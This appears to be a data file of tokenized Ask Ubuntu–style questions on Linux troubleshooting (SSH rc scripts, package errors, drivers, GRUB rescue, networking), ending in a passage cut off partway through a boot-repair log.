382485	ssh - how to force execution of a script ( /etc/sshrc , forcecommand , .. ? ) on login but still allow execution of the client 's ~/.ssh/rc ?	as far as i know upon ssh login the following files are executed [ server ] /etc/environment [ client ] ~/.ssh/environment - > can be locally overriden by `` ssh_env '' environment variable - > will override host= > sendenv in local ~/.ssh/config - > will be filtered by `` acceptenv '' directive ( s ) in remote /etc/ssh/sshd_config - > will not be used if `` permituserenvironment no '' in remote /etc/ssh/sshd_config [ server ] /etc/ssh/sshrc - > will not get executed if `` forcecommand '' exists in remote /etc/ssh/sshd_config - > will not get executed if local ~/.ssh/rc exists - > can be overriden by `` forcecommand '' ( kind of ) [ client ] ~/.ssh/rc - > will not get executed if `` forcecommand '' is configured - > can be overriden by local `` ? ? ? '' environment variable ? question how can i force the execution of a script on the server but still allow the client to use his ~/.ssh/rc ? bonus question is it possible to override the local ~/.ssh/rc location using an environment variable ? if yes which one ?
382487	kernel image error while installing ubuntu 13.10	i downloaded ubuntu 13.10 to install on my external hdd . i have never worked with a linux os before so i 'm completely new to this . after i created a bootable usb flash disk with the iso image on it , and configured my bios to boot from it , it gives an error saying that it could not find the kernel image : /isolinux/syslinux.cfg and then a boot line , i 've tried several of the solutions on other forums , but none of them worked .
382491	dspace quick build	i have installed dspace on my ubuntu . and i want to customize it so that i can use it for my institute . i have one question ? whenever i do some changes in my jsp or xml pges..i have to rebuild the dspace as given on their website .now when i use the command ( as given ) mvn package it starts downloading some files ..i do n't want it to re-download those files as i am doing simple changes to jsp files..hence simple quick build should do the work . please help me guys ! i do n't have proper network connection..i ca n't afford to download these files again and again.. thanks in advanced !
382496	sound changed to muted on boot-up ?	i just installed ubuntu 12.04 lts on my ibook g4 and every time i reboot the volume is changed to mute and i have to turn it up again . how can i make it so it automatically unmutes before lightdm and gnome 2 . video example=https : //www.youtube.com/watch ? v=v8zv5-8bjdo
382497	errors when removing spotify	dpkg : error processing spotify-client ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : spotify-client
382500	can we clone a virtual machine to computer ? i try it but still failure	the follow is my doing : install ubuntu server to a virtualbox machine disk /dev/sda ; add another virtual disk to the machine , and fdisk this /dev/sdb ; copy the virtualbox machine to /dev/sdb ; edit /etc/fstab ; install grub2 to /dev/sdb ; and manual edit /boot/grub/grub.cfg ; move away /dev/sda and reboot , failure . why ?
382508	bash return permission denied error when i redirect the output of ls to a file	i 'm currently studying shell commands , one of the exercises consists in creating a structure with various directories and subdirectories . i wrote ls -lar > hello , it was supposed to create a text file named hello . however , i get the following message bash : hello : permission denied , even when i type sudo in the beginning . the command worked in another linux distribution . also , i used a few minutes ago ls -la in the directory where i want to create the file and it gave me this : drwxr-xr-x 2 root root 4096 nov 26 10:56 . drwxr-xr-x 5 root root 4096 nov 26 10:56 .. according to the first triad i have writing privileges ?
382513	ignoring namebased server configuration in apache2 with dns	apache used to work ok when i was using the local name resolution with /etc/hosts file . after setting up a dns server on the machine , now eveything that resolves to this machine 's ip address seems to be referring to the the default website in /var/www , regardless of the name based configurations . i also tried commenting out the entire 000-default.conf file 's content . no change . website config file at : /etc/apache2/sites-available/www.seonim.lan < virtualhost *:80 > servername www.seonim.lan serveradmin admin @ seonim.lan documentroot /var/www/www.seonim.lan errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > anything i 'm missing ?
382517	run a 32 bit software on a 64 bit architecture under ubuntu 13.10	i need to use a software which already works fine in a 32 bit ubuntu 10.10 virtual machine , with my 64 bit ubuntu 13.10 . i found all the executable files and copy/pasted them into the same directory ( /usr/local// ) , i used the chmod command to make them executable , and as i upgraded my ubuntu from 13.04 to 13.10 i was able to install the ia32 : libs package adding the raring depository in synaptic . some of the features ( some of the executables ) work but the main graphic interface which is run with java does not . in the terminal , when running the command i get the following message , and nothing else happens whereas the graphic window should appear as it does in the virtual machine . exception in thread `` main '' java.awt.headlessexception at java.awt.graphicsenvironment.checkheadless ( graphicsenvironment.java:207 ) at java.awt.window. < init > ( window.java:535 ) at java.awt.frame. < init > ( frame.java:420 ) at java.awt.frame. < init > ( frame.java:385 ) at javax.swing.jframe. < init > ( jframe.java:174 ) at xedge.ui.xedge. < init > ( xedge.java:332 ) at xedge.ui.xedge.main ( xedge.java:7785 ) what should i do in order to get the graphic window and the software to work ? it seems that i need another version of java but how can i install that properly ?
382518	configure squid proxy not to serve pages from a location	how do i configure squid proxy to block http responses from web server installed on another machine ?
382520	asus x550l problems with ubuntu 13.10	problems with audio . headphones work , but without them sound is not working . many fn keys are n't working . the brightness levels , play buttons , etc . the brightness , if i adjust it , then i restart the laptop , it resets my adjustments . below is output from running lscpi : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:04.0 signal processing controller : intel corporation device 0a03 ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation lynx point-lp thermal ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) 02:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 12 ) 03:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 04:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 )
382524	unable to login ( gui ) `` init -- user '' process at 100 %	update : i need this laptop , and this problem makes it pretty unusable , so i ended up having to restore from a backup . if it happens again i 'd be able to test any suggestions , but otherwise i may not be of much use in confirming answers . i booted my 13.10 laptop today to find that i am now unable to login . i see the lightdm login screen and can type my password . it gets accepted then i see a blank background and a mouse cursor which i can move and nothing else happens . i am able to login to the terminal ctrl-alt-f1 and see that there is a init process which is using 90 % cpu . killing this pid brings me back to the login screen . some other things i 've found possibly related : creating a new user or logging into guest account produces same result . install gnome-sessions-fallback and try logging into that produces the same result . .xsession-errors contains the line `` init : temporary process spawn error : bad file descriptor '' doing lsof on the init pid shows some info : lsof : warning : ca n't stat ( ) fuse.gvfsd-fuse file system /rus/user/1000/gvfs output information may be incomplete also , i sometimes see mention of a my-weather-indicator crash.log file . i tried uninstall my-weather-indicator ( did n't help ) there are a lot of pipe files which pop up periodically with errors like `` ( readlink : no such file or directory ) '' with a path to /proc/ # # # # /fd/ # # # pattern strace on the process informs me that it is repeatedly trying to open the file /dev/ptmx , and open a pipe , then it closes the three file descriptors . i ca n't recall exactly what i did yesterday that may have done this . i booted the laptop at home and did some compiles at the end the compile completed , but the init process was at 100 % . i did n't think anything of it and powered off thinking it would be better after a reboot in the morning . anyway , maybe someone can help . i do n't even know where to go about reporting this bug . i 'd also like to avoid reinstalling , but at this point it may be faster than debugging this .
382527	ubuntu is still on refit	i just used a ubuntu live dvd to uninstall ubuntu from my mac by formatting both ext4 and linux-swap partitions to fat32 and then deleting them ( so i could resize mac 's partition later using apple 's disk utility ) . there is a problem now : ubuntu is still appearing in refit . does that mean that the bootloader is still there somewhere ? if so , where exactly is it ? thank you .
382532	google hangout and pulseaudio : how to route multiple audio sources as hangout input ?	what i would like to achieve is the capability to provide google hangout with an audio input virtual device that is actually the result of a merge between different audio sources . in the simplest case the situation would be : source 1 : usb or internal microphone source 2 : vlc / rythmbox with some audio file playing in the background as said , source 1 and 2 should be merged to a virtual input device , `` detectable '' from hangout . now , it looks quite easy how to combine sources when it comes to record them : basically 2 loopback and 1 sink are needed ( more details here http : //forums.opensuse.org/english/get-technical-help-here/multimedia/460207-looking-maybe-audio-mixer-use-pulse-audio.html ) but what i do not get is : is it possible , and if yes , how , to create a virtual input device with pulseaudio ? is google hangout for linux ( ubuntu 13.10 x64 in my specific case ) using pulseaudio or alsa ? thanks in advance !
382536	is it possible to install ubuntu touch in htc desire x	is it possible to install ubuntu touch in htc desire x it has 768mb of ram and 4gb internal memory ( 2gb usable memory ) it has processing speed of 1ghz and has dual core processor
382538	certain wine games cause my graphics to fall back	this is kind of difficult for me to ask because i 'm not sure of the terminology of what is happening . i have some games installed in wine ( 1.6 ) . most of the games run fine but some of the games open in a window , and the graphics become different on the whole desktop . it appears to be some kind of `` fail safe graphics '' . one of the games is warcraft 3 , and the terminal output it is complaining about the `` quartz '' library . it was disabled in my config , so i enabled it , and ran w3 again , the terminal kept spitting out errors constantly then ended with `` out of memory '' my laptop is powerful enough to run all of these games , and the `` graphics '' issue has happened in the past . is there any way to fix this ?
382541	play/search a shout cast fm station on ubuntu 12.04 lts	i am mainly looking for tamil and hindi channels . is there any player for ubuntu which will allow me to search for tamil and hindi language fm stations and stream on my pc ?
382543	help changing an environmental variable	i need a little help with this syntax . do i use the quotes ? do i add these variables to .bashrc or bash ? are bash and .bashrc the same file ? where is the .bashrc file ? what is the `` . '' leading the .bashrc ? echo `` export cwproot=~/cwp/43r1 '' > > ~/.bashrc echo `` export path= $ path : ~/cwp/43r1/bin '' > > ~/.bashrc
382548	items can not be installed or removed until the package catalogue is repaired	installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 260816 files and directories currently installed . ) unpacking gnome-shell-extensions ( from ... /gnome-shell-extensions_3.4.0+git20120414.5ca9f35a-0ubuntu1~webupd8-0_all.deb ) ... dpkg : error processing /var/cache/apt/archives/gnome-shell-extensions_3.4.0+git20120414.5ca9f35a-0ubuntu1~webupd8-0_all.deb ( -- unpack ) : trying to overwrite '/usr/share/gnome-shell/extensions/drive-menu @ gnome-shell-extensions.gcampax.github.com/convenience.js ' , which is also in package drivemenu-ext 0.1~precise no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gnome-shell-extensions_3.4.0+git20120414.5ca9f35a-0ubuntu1~webupd8-0_all.deb error in function : dpkg : dependency problems prevent configuration of gnome-shell-extensions-common : gnome-shell-extensions-common depends on gnome-shell-extensions ( > = 3.4.0~ ) ; however : package gnome-shell-extensions is not installed . dpkg : error processing gnome-shell-extensions-common ( -- configure ) : dependency problems - leaving unconfigured this is what i get when try to repair . i have already tried auto remove , install -f neither worked
382554	light distro for eeepc	hello i have an eeepc 900 i want to install a light distro on 4gb sd card for simple tasks user must be able to launch mo3 ( through vlc ) , occasionally surf internet , and attach usb stick to get mp3 from everything should be easy , form desktop , usb automount , click on drive launch mp3 , and may be save them on desktop no much trying to test several distro but ca n't get out of it with a simple and easy distro tried ubuntu mini , but after install packaing and desktop manager system seems not much usable , usb does n't mount , and other weird thing . i am not experienced , and i should need somenthing ready to use plaese an nelp for it thanks
382557	the nvidia driver harmed my lubuntu	i ha ve a big problem , i 'm new on linux lubuntu , i installed lubuntu on my hp tx 1000 series , and my wifi was'nt working , i just used a ethernet cable to connect to the internet , i tried so many things to repair my wifi , until one day ( actually 3 days ago ) i update from jockey application the nvidia driver ( before i had the broadcom 4321 driver on use ) and it asked me to reboot my pc , so i did it , and when the lubuntu log in appear , the screen is turning all black and i ca n't see anything ; before that ( when broadcom driver was set , lubuntu was working well , but without wifi connection ) now i ca n't do anything . i had the 13.4 version and i tried updating from the ctrl+ f1 option before lubuntu load , to the 13.10 saucy but it didn ' t help me . so i want to know if i can remove that nvidia driver that caused all the problem or how can i manage the jockey application before lubuntu load . please i need help ...
382558	followed instructions to fix brightness at boot using xbacklight , screen goes black after boot	so i followed the instructions in the top answer late last night : how do i set default display brightness ? i 'm running ubuntu 13.10 on a hp envy 15t quad and it was running perfectly other than the brightness settings not sticking at boot . i see the purple loading screen then the screen goes completely off , as in no backlight at all and the brightness keys do n't do anything . i ca n't load ubuntu in safe mode with the default vga adapters either . trying to learn how to trouble shoot my mistakes instead of just doing a clean install since i actually have gotten pretty cozy with my dev environment . i was thinking of uninstalling xbacklight and then purging my config/data from grub terminal , but since there 's no coming back from that i thought i 'd wait till i heard from someone more experienced .
382559	would gta sa work fine with xubuntu 13.10	would gta sa work fine with xubuntu 13.10 and the open source driver for my graphics amd mobility radeon hd 4225/4250 driver ?
382560	unable to start fedora from usb	i already installed ubuntu 13.10 and i wanted to dual boot ubuntu and fedora . i created live usb with command : sudo dd if=fedora-live-desktop-x86_64-19-1.iso of=/dev/sdb1 but i am not able to boot from usb . my computer simply starts ubuntu without any error message . is there anything i am missing ?
382562	wake up my pc from suspend using a usb device ( e.g . mouse )	i 'm using ubuntu 12.04.3 lts and i ca n't wake up my desktop pc from suspend with a usb device ( e.g usb mouse ) . the entire process of suspending/resume works perfectly but the only way to resume it 's by pressing the pwr button . here are some logs that i hope could help someone troubleshooting my issue : http : //paste.ubuntu.com/6468990/ . i tried to follow this guide to enable wake up from usb devices but with no luck : http : //bernaerts.dyndns.org/linux/74-ubuntu/220-ubuntu-resume-usb-hid . any suggestions are appreciated , thanks .
382564	laptop fan/heat high when using only ubuntu 13.04	i am using i7 dell laptop . i installed ubuntu 13.04 along with windows 8 . when i use ubuntu , i feel fan speed is high , which i do n't see when using in windows 8 . i installed tlp package but that did not help either . -- - tlp 0.4 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +++ temperatures cpu temp = 49 [ 째c ] fan speed = ( not available ) i m not sure why fan speed is not altered . i tried to install graphics driver from https : //downloadcenter.intel.com/detail_desc.aspx ? dwnldid=13815 but after the hell happened . i lost my unity and all the graphics gone then it took me hours to restore the system with old option . do i not have any other option for installing graphics driver or any other remedy like installing ubuntu 13.10 ? output of lspci command is : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati chelsea lp [ radeon hd 7730m ]
382565	validation fails when trying to rebuild package , no openpgp data	i 'm trying to rebuild a package from non-official repository , namely : dget -x http : //packages.dotdeb.org/dists/wheezy/nginx/source/nginx_1.4.4-1~dotdeb.1.dsc and here 's what i get : dscverify : nginx_1.4.4-1~dotdeb.1.dsc failed signature check : gpg : no valid openpgp data found . gpg : processing message failed : eof validation failed ! ! i 'm not really able to understand whats happening here . am i safe to skip this message ? is there a way to make it work without an error ?
382572	password error regarding synaptic	i 'm using lubuntu 13.10 and i removed my root password using the visudo command as directed in this video . but , i 'm facing issues with respect to synaptic , it shows me a log and asks for a passowrd . simply checking okay does not work . thank you
382574	no internet connection via lan cable	i have a asus eee pc 1000he mini laptop with 12.04 ubuntu installed dual booted with xp . when i plug the lan cable is it connects fine , i can also reach the router . but i can not connect to any website . now i thought it was a problem with the router but here is the strange part : if i connect a other laptop to the same cable it works fine . and if i boot on on the eee pc from a live usb the internet works as well ! if nothing comes up i will try to fix it by reinstalling ubuntu , but i would prefer if i can solve this in a less drastic way . edit : lspci -v gives this output about ethernet controllers and network controllers : 1:00.0 network controller : qualcomm atheros ar928x wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave aw-ne771 802.11bgn wireless mini pcie card [ ar9281 ] physical slot : eeepc-wifi flags : bus master , fast devsel , latency 0 , irq 19 memory at fbef0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k 03:00.0 ethernet controller : qualcomm atheros ar8121/ar8113/ar8114 gigabit or fast ethernet ( rev b0 ) subsystem : asustek computer inc. device 8324 flags : bus master , fast devsel , latency 0 , irq 17 memory at fbfc0000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at ec00 [ size=128 ] capabilities : < access denied > kernel driver in use : atl1e kernel modules : atl1e
382577	how can i enable bonded network interfaces in ubuntu 13.04/13.10 using networkmanager	this question is about network interface bonding in ubuntu 12.04 precise and newer ( 12.10 quantal/13.04 raring/13.10 saucy ) . bonding is also known as network interface teaming , link aggregation , and port trunking . there are instructions out there for setting up bonding by modifying /etc/network/interfaces ( help.ubuntu.com , serverlab.ca ) however i ca n't find any instructions or a tutorial on how to set it up using networkmanager in ubuntu . how do i bond my wired ( eth0 ) and wireless ( wlan0 ) network interfaces together using networkmanager ? additional info as of networkmanager 0.9.4 bonding is supported and networkmanager 0.9.4 is included in ubuntu 12.04 lts precise . networkmanager is then updated in ubuntu 12.10 quantal to 0.9.6 and `` slaves '' were added in ubuntu 13.04 raring with networkmanager 0.9.8
382578	create bootable cd from installed system	i have ubuntu server 13 installed , with a somewhat complex arrangement of software raid , lvm2 and partitions . it 's the kind of installation that the standard ubuntu boot cd ca n't cope with . one day the system ate itself but fortunately the initrd boot image had enough tools in it to repair the system . is there a way i can create a bootable cd/usb/whatever image from my installed system that incorporates all the kernel modules , raid config and so on from the actual machine - rather than a generic rescue disk . i know there 's a very similar question on here , but the method that i 'd use relies on remastersys which is ... no more .
382579	where i can find the status of the released versions of ubuntu ?	i want to know where i can find updated information about all the stables and in-development versions of ubuntu , where i can find this information ? this question is mean to be a canonical question . it expects to answer the following questions : is x version stable yet ? is x version in beta ? is x version still supported ? what versions are still supported ? what are the versions in beta/alpha ? until where x version will be supported ? have x version ceased support ? when will be x version released ? where i can download any release ? when will the next lts version of ubuntu be released ? the list is not exhaustive .
382581	ca n't login to user profile on ubuntu 12.04	when i try to log into my user profile , the screen turns black and then just returns to the log-in menu . what to do ? schould i `` repair '' ubuntu . if yes , how is it done ? i ca n't choose to `` repair '' like in windows when i boot up with the ubuntu installation usb i got .
382582	apt-get could not connect to a weird ip/port , why ?	my apt-get for some reason , suddenly stopped to work properly and now i ca n't install any package whatsoever or do an update.. i have browsed and googled for some answers but nothing seems to work . at this point i am seriously considering resintalling ubuntu to fix this . what i have tried : selecting the `` select best server '' option from the ubuntu software center . the speed was still drastically slow and unusable ultimately , because it just times out downloading and cancels between updates . selecting the `` main server '' . same thing as before . selecting the `` server for united states '' . same thing as before . generating a new sources.list from http : //repogen.simplylinux.ch/generate.php . it did n't help the problem . tried in different networks and there was no problem with the connection . the connection was fast and was downloading torrent for instance at 1 mbyte/s speed . any ideas what could be wrong ? err http : //extras.ubuntu.com precise/main translation-en unable to connect to 213.181.73.145:8080 : and err http : //extras.ubuntu.com precise release.gpg could not connect to 213.181.73.145:8080 ( 213.181.73.145 ) . - connect ( 110 : connection timed out ) any idea how to fix this ? thanks . also , i have tried with a similar computing power computer in the same network , with the same sources.list file , the same server , and on that computer the speed is 100x times faster and it works . really confused about that as well !
382583	ubuntu 12.04 install hangs while copying files	new user trying to install 12.04 in vm box . all goes well until 75/80 % of files are copied . at that point install hangs . no obvious error msg displayed .
382584	kernel headers after upgrading kernels from 3.5.7 to 3.9.0	i upgraded my kernel on ubuntu 12.04 in order to gain access to the include/uapi/ headers . the full kernel version that i upgraded to is 3.9.0-030900-generic , following this tutorial . unfortunately , the headers seem to have remained the same because the uapi directory does n't exist . to diagnose the problem , i tried to download the source for my 3.9 kernel with : sudo apt-get source linux-image- $ ( uname -r ) however the output is picking 'linux ' as source package instead of 'linux-image-3.9.0-030900-generic' and this results in the kernel source for 3.2 being downloaded instead of 3.9 . what action must i take to install the kernel/headers properly ? i looked through these two posts before posting for insights , to no avail : update linux headers when kernel is updated linux headers not upgraded
382585	stats on ubuntu users for a research paper	i am doing a research project for one of my classes and was wondering if anyone had an idea on how to find the stats behind the number of users of ubuntu ? hope you guys can help .
382588	grub rescue unknown filesystem ... the ultimate hopelessness	i know the question has been asked so many times but in my case whatever i do as indicated in the following post ( all solutions are tried ) 'unknown filesystem ' is the ultimate reply.. grub rescue - error : unknown filesystem i also tried live usb of boot-disk-recovery which too fails to identify my device partition holding ubuntu 12.04 x32 ( which by the way is sdb2 ) although it created bootscript which is attached below . boot info script e7fc706 + boot-repair extra info [ boot-info 31jan2013 ] ============================= boot info summary : =============================== = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos2 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.05 20120702 boot sector info : syslinux looks at sector 1030576 of /dev/sda1 for its second stage . syslinux is installed in the directory . according to the info in the boot sector , sda1 starts at sector 0 . but according to the info from fdisk , sda1 starts at sector 62 . operating system : boot files : /syslinux/syslinux.cfg /ldlinux.sys sdb1 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sdb3 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sdb5 : __________________________________________________________________________ file system : boot sector type : windows vista : ntfs boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 4003 mb , 4003463168 bytes 124 heads , 62 sectors/track , 1017 cylinders , total 7819264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 62 7,818,695 7,818,634 c w95 fat32 ( lba ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 80.0 gb , 80026360832 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301486 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 2,000,895 1,998,848 82 linux swap / solaris /dev/sdb2 * 2,000,896 58,644,479 56,643,584 83 linux /dev/sdb3 58,646,526 156,301,311 97,654,786 5 extended /dev/sdb5 58,646,528 156,301,311 97,654,784 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 3273-d2bd vfat /dev/sdb1 19d35932-1dbf-4be0-83aa-3d76b646dd80 swap ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) ========================= sda1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 300 ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ================= sda1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sda1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sdb3 00000000 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 | ... ... ... ... ... .| * 000001b0 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 00 fe | ... ... ... ... ... .| 000001c0 ff ff 07 fe ff ff 02 00 00 00 00 18 d2 05 00 00 | ... ... ... ... ... .| 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== file descriptor 8 ( /proc/2401/mounts ) leaked on lvscan invocation . parent pid 7264 : bash no volume groups found additional information : =================== log of boot-repair 2013-11-26__17h13 =================== boot-repair version : 3.198~ppa16~raring boot-sav version : 3.198~ppa16~raring glade2script version : 3.2.2~ppa45~raring boot-sav-extra version : 3.198~ppa16~raring file descriptor 8 ( /proc/2401/mounts ) leaked on lvs invocation . parent pid 4002 : /bin/sh no volume groups found boot-repair is executed in live-session ( boot-repair-disk 32bit 24avr2013 , raring , ubuntu , i686 ) ls : can not access /home/usr/.config : no such file or directory cpu op-mode ( s ) : 32-bit , 64-bit noprompt cdrom-detect/try-usb=true file=/cdrom/preseed/lubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- =================== os-prober : =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' 3273-d2bd '' type= '' vfat '' /dev/sdb1 : uuid= '' 19d35932-1dbf-4be0-83aa-3d76b646dd80 '' type= '' swap '' =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : =================== parted -l : model : kingston dt 101 g2 ( scsi ) disk /dev/sda : 4003mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 31.7kb 4003mb 4003mb primary fat32 boot , lba model : mass storage device ( scsi ) disk /dev/sdb : 80.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1024mb 1023mb primary linux-swap ( v1 ) 2 1024mb 30.0gb 29.0gb primary boot 3 30.0gb 80.0gb 50.0gb extended 5 30.0gb 80.0gb 50.0gb logical ntfs =================== parted -lm : byt ; /dev/sda:4003mb : scsi:512:512 : msdos : kingston dt 101 g2 ; 1:31.7kb:4003mb:4003mb : fat32 : :boot , lba ; byt ; /dev/sdb:80.0gb : scsi:512:512 : msdos : mass storage device ; 1:1049kb:1024mb:1023mb : linux-swap ( v1 ) : : ; 2:1024mb:30.0gb:29.0gb : : : boot ; 3:30.0gb:80.0gb:50.0gb : : : ; 5:30.0gb:80.0gb:50.0gb : ntfs : : ; =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sda1 on /cdrom type vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/lubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=lubuntu ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 size slaves stat subsystem trace uevent /sys/block/sdb ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sdb1 sdb2 sdb3 sdb5 size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart alarm ashmem autofs binder block bsg btrfs-control bus char console core cpu cpu_dma_latency disk dri ecryptfs fb0 fd full fuse fw0 hidraw0 hidraw1 hidraw2 hpet input kmsg kvm log mapper mcelog mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sdb sdb1 sdb2 sdb3 sdb5 sg0 sg1 shm snapshot snd stderr stdin stdout uinput urandom usb v4l vga_arbiter vhost-net video0 zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.5g 19m 1.5g 2 % / udev devtmpfs 1.5g 12k 1.5g 1 % /dev tmpfs tmpfs 300m 816k 299m 1 % /run /dev/sda1 vfat 3.8g 496m 3.3g 14 % /cdrom /dev/loop0 squashfs 431m 431m 0 100 % /rofs none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs tmpfs 1.5g 8.0k 1.5g 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.5g 0 1.5g 0 % /run/shm none tmpfs 100m 12k 100m 1 % /run/user =================== fdisk -l : disk /dev/sda : 4003 mb , 4003463168 bytes 124 